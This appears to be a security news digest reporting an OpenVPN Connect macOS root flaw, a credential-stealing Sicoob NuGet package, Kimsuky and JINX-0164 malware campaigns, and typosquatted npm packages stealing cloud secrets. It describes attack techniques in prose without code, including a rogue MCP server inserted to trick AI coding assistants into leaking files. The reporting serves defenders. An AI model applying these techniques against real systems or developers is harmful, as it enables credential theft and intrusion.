Trending Topics

Critical OpenVPN Connect macOS Flaw Lets Local Attackers Gain Root Access

A critical vulnerability in OpenVPN Connect for macOS, tracked as CVE-2026-9560, allowed local users to gain full root privileges by abusing the app’s privileged helper component. The issue affected OpenVPN Connect versions 3.5.1 through 3.8.1, where the background helper that manages VPN connections handled local inter-process communication insecurely, enabling a local attacker to send crafted messages that the service would execute with elevated rights. With a CVSS score of 9.4, successful exploitation could give an attacker complete control over a Mac with OpenVPN Connect installed, including installing additional malware, disabling security tools, or tampering with VPN configurations. The flaw was discovered and responsibly reported by researchers Ismael Esquilichi, Pablo Redondo, and Lê Đức Ninh, and has now been fixed in OpenVPN Connect version 3.8.2 for macOS. In addition to closing the privilege escalation hole, the 3.8.2 release also corrects bugs where certain trailing characters in server URLs could break web-based authentication, and where profile switching sometimes triggered blank profile imports or crashes during migration. Users and enterprises are strongly urged to upgrade to the latest version, especially in shared or managed environments where local accounts might be abused to escalate privileges and undermine the integrity of supposedly secure VPN protected endpoints.

Malicious Sicoob NuGet Package Steals Banking Credentials And Targets Cloud Secrets

A malicious NuGet package posing as a legitimate C# SDK for Brazilian banking cooperative Sicoob has been caught stealing highly sensitive authentication material from developers, turning routine API integration into a potential banking heist. Labeled Sicoob[.]Sdk and downloaded nearly 500 times, versions 2.0.0 through 2.0.4 quietly exfiltrated client IDs, PFX certificates, and PFX passwords to a hard-coded Sentry endpoint whenever developers instantiated the SicoobClient class with their production credentials. Because these PFX certificates underpin automated operations like Pix instant payments and dynamic QR code generation, any compromised material could allow attackers to impersonate a business in Sicoob’s banking network and abuse payment flows at scale. Researchers found that the package also captured raw Boleto API responses, potentially exposing transaction details, amounts, due dates, and payer or payee data that could feed downstream fraud or data leakage. To appear trustworthy, the threat actor maintained a clean GitHub repository that did not include the malicious code, while slipping the data-stealing logic only into the NuGet artifact, a classic source to package mismatch that exploits developers’ trust in open-source ecosystems. NuGet has since blocked Sicoob. Sdk and the “sicoob” publisher profile that listed 11 additional packages with around 6,000 downloads, but organizations that have ever installed the package are urged to remove it, treat all PFX material as compromised, replace certificates, rotate passwords, adjust client IDs, and review Sicoob API logs for suspicious activity. The discovery lands alongside a separate cluster of 14 malicious npm packages that typosquat popular OpenSearch, Elasticsearch, DevOps, and configuration libraries to harvest AWS credentials, HashiCorp Vault tokens, npm tokens, and CI or CD secrets via preinstall hooks and a custom credential harvester. These campaigns, together with recent waves of hundreds of npm payloads abusing postinstall scripts, dependency confusion, and ad monetization, illustrate how attackers have moved beyond simple typosquatting toward what Sonatype calls manufactured legitimacy, crafting package names, scopes, and versions that look entirely routine inside modern development workflows. For defenders, no open-source package should be implicitly trusted based on name recognition or download count alone, and securing software supply chains now demands continuous monitoring for source-to-package mismatches, credential exfiltration, and suspicious lifecycle scripts before code ever reaches production pipelines.

Kimsuky Deploys HTTPSpy And Supercharges Its Espionage Toolkit

The North Korean state-sponsored group Kimsuky, also known as Velvet Chollima or APT43, is hitting South Korean military and corporate targets with a refreshed HTTPSpy campaign that leans on fake security software sites and spoofed Webex pages to quietly hijack endpoints. In recent attacks observed through March and April 2026, the group masqueraded as installers for a South Korean B2B messaging service and a fraudulent Cisco Webex troubleshooting page, tricking victims into running JSE-based droppers that pull multi-stage payloads via PowerShell and ultimately deploy the HTTPSpy remote access trojan. HTTPSpy provides full-featured control of compromised systems, including command execution, file upload and download, screenshot capture, process injection, and self-deletion, giving Kimsuky a resilient foothold in sensitive networks. Researchers say Kimsuky has gone beyond simple malware delivery, wiring in real-time infection checks through mechanisms like JSONPing and even using stolen meeting schedules to redirect victims into legitimate Webex rooms so the lure looks authentic. The same cluster of activity shows the group expanding its arsenal by delivering multiple malware families via JSE, PIF, SCR, and EXE droppers, split broadly between the PebbleDash and AppleSeed lines. New PebbleDash linked tools include HelloDoor, a Rust-based backdoor likely assisted by large language models, plus HttpMalice and HttpTroy, both capable of reconnaissance, command execution, in-memory payload loading, screenshot capture, reverse shells, and extensive cleanup to remove traces. On the AppleSeed side, Kimsuky is doubling down on data theft, with AppleSeed Spy variants harvesting documents, screenshots, keystrokes, USB drive listings, and especially certificates from the C:\GPKI directory, mirroring capabilities previously seen in Troll Stealer. HappyDoor, a long-running AppleSeed offshoot first seen in 2021, remains in play and underscores the group's practice of keeping its source code and iteratively improving it over time. Kaspersky further highlights Kimsuky’s growing use of legitimate infrastructure, such as Visual Studio Code Remote Tunneling, Cloudflare Quick Tunnels, and the DWAgent remote monitoring tool, to establish covert remote access that blends into normal IT operations rather than relying solely on classic command-and-control channels. Taken together, the campaigns point to a threat actor with broad access to its original codebase, a willingness to experiment with Rust and Go tooling, and overlapping targets that span defense, military, government, medical, machinery, and energy sectors in South Korea and beyond. PebbleDash operations have already reached defense organizations in Brazil and Germany, while AppleSeed continues to focus primarily on government entities. For defenders, Kimsuky’s blend of social engineering, staged loaders, living-off-the-land tunnels, and evolving backdoors is a reminder that security teams must scrutinize even “legitimate” remote access channels, harden against script-based droppers, and closely monitor certificate stores and GPKI paths for signs of targeted exfiltration.

JINX‑0164 Uses LinkedIn Lures To Drop Custom macOS Infostealer On Crypto Firms

A newly identified threat actor, tracked as JINX‑0164, is targeting cryptocurrency organizations through fake recruiter outreach on LinkedIn, virtual meeting invites, and bespoke macOS malware to steal digital assets. Active since at least mid 2025 and motivated by financial gain, the actor targets developers and engineers, using recruitment-themed social engineering to move from a single compromised laptop into CI or CD pipelines and code distribution systems, where they can ultimately tamper with source code and siphon crypto wallet credentials. In the attack chain detailed by researchers, victims first receive messages from credible-looking LinkedIn profiles offering interviews, then are directed to a rogue domain impersonating a teleconferencing provider that prompts them to download a “meeting client.” That installer actually pulls down a bash script from a fake Apple driver store domain, which in turn downloads an architecture-aware payload masquerading as a system audio driver named coreaudiod, saved as ChromeUpdater and launched via launchctl. The payload is a Python based macOS infostealer and remote access trojan dubbed AUDIOFIX, and once active it harvests a wide range of sensitive data including password manager entries, browser and iCloud Keychain credentials, SSH keys, console histories, cryptocurrency wallet extensions and addresses, plus live Discord, Slack and Telegram sessions, while also supporting manual reconnaissance, file exfiltration, shell command execution, and additional payload retrieval. JINX‑0164 does not stop at LinkedIn lures; the group also weaponized the JavaScript ecosystem by pushing a compromised version of the @velora-dex/sdk npm package, a legitimate DeFi library, that silently installed a Go-based backdoor known as MiniRAT on macOS systems. MiniRAT allows attackers to upload files, run arbitrary commands, and pull extra tooling from their own servers, turning what looks like a normal development dependency into a bridgehead into crypto trading infrastructure. While aspects of the campaign, including its focus on cryptocurrency, VPN usage, and spoofed domains, resemble patterns seen in North Korean clusters such as BlueNoroff, current evidence does not show direct infrastructure overlaps, leaving JINX‑0164 treated as a distinct, financially driven actor that combines social media-based phishing, macOS-specific malware, and software supply chain abuse to reach high-value crypto targets.

Typosquatted npm Packages Used To Steal Cloud and CI/CD Secrets

Security researchers have uncovered a live supply chain campaign in which a single threat actor published dozens of typosquatted npm packages that quietly steal cloud and CI/CD credentials from developer environments and build pipelines. The malicious packages closely mimic popular OpenSearch and Elastic search configuration and DevOps libraries, then use preinstall scripts and custom infostealer code to harvest AWS, Azure, and GCP credentials, HashiCorp Vault tokens, npm tokens, and other environment secrets before exfiltrating them to attacker-controlled infrastructure. Once in possession of these secrets, the attacker can pivot into CI workflows, cloud accounts, and private repositories, where they can tamper with code, implant backdoors, or abuse cloud resources. This campaign follows a broader pattern of npm supply chain abuse that includes worm-like malware, which spreads by using stolen tokens to inject malicious dependencies into additional repositories and GitHub Actions workflows, effectively turning compromised developers and projects into new propagation points. In some variants, researchers even observed modules that tamper with local configurations for AI coding assistants by inserting a rogue Model Context Protocol server designed to trick tools into exfiltrating sensitive local files and secrets. The incident underscores how typosquatting is evolving from simple lookalike naming into complex multi-stage operations that blend credential theft, CI takeover, and AI toolchain manipulation, and it reinforces the need for organizations to enforce strict dependency policies, monitor for suspicious lifecycle scripts, and treat any newly published or unfamiliar npm package as high risk until proven otherwise.